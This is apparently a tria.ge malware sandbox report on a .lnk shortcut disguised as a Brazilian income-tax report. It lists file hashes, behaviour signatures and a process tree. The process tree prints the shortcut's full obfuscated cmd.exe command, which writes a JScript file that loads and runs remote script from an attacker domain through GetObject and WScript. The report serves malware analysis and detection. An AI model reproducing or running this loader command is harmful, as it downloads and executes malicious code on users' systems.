Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    187s
  • max time network
    192s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/12/2022, 11:09

General

  • Target

    RelatorioIRPF2022x_763.59941234.894541.08054.lnk

  • Size

    493B

  • MD5

    5d675c77ace428b2959c9579f4e3605c

  • SHA1

    b50d3aa98338a52c047a6cc0399046b8e65c8178

  • SHA256

    0d43d8d11bc22acb24fd9b02ed43fa2e40ba29f07272d278a33d412782435119

  • SHA512

    3ae5e8445781b77852fd6d6cdc07459e531865418a91f5a008dd0934ed160db26a4a39fb5c5ed725a9670cfe76ab34a2f61cf5a61278aeb49a7d4dd5c04c32a8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_763.59941234.894541.08054.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "md C:\ZUn9AOQ\&&s^eT SBFF=C:\ZUn9AOQ\^ZUn9AOQ&&S^Et NGOR=v2C7ar CDl3="sc"+"^r";DDl3="i^p"+"t^:2C7h";EDl3="T"+"t^P"+":";G2C7et^Ob^j2C7ec^t(CDl3+DDl3+EDl3+'&&s^ET E67=HTXCAHTXCAwaew.tnemllorne.cyouHTXCA?1HTXCA');&&s^Et/^p V8JJ="!NGOR:2C7=!!E67:HTXCA=/!"<n^ul > !SBFF!.^jS|ca^ll c^a^ll !SBFF!.jS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" sEt/p V8JJ="var CDl3="sc"+"^r";DDl3="i^p"+"t^:h";EDl3="T"+"t^P"+":";GetObject(CDl3+DDl3+EDl3+'//waew.tnemllorne.cyou/?1/');" 0<nul 1>C:\ZUn9AOQ\ZUn9AOQ.jS"
        3⤵
          PID:2560
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" call call C:\ZUn9AOQ\ZUn9AOQ.jS "
          3⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ZUn9AOQ\ZUn9AOQ.jS"
            4⤵
            • Blocklisted process makes network request
            PID:1728

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ZUn9AOQ\ZUn9AOQ.jS

      Filesize

      107B

      MD5

      29cf655d6b28293d388268e308f7b554

      SHA1

      d43da5881b3968e81ba3e5e61f580c5f860302d9

      SHA256

      776fee39e41f81d10fa08c53fedf90716c97b5483d158c2fdbd5053a85e6d207

      SHA512

      eeabd784e408e4f62e35994e89acb5c94418548b4ba56b4ebaf2c15891a04aa587b32c1ac3449cbe58e5525d536890c0d17f754bf36ca00725461b9068d9d0df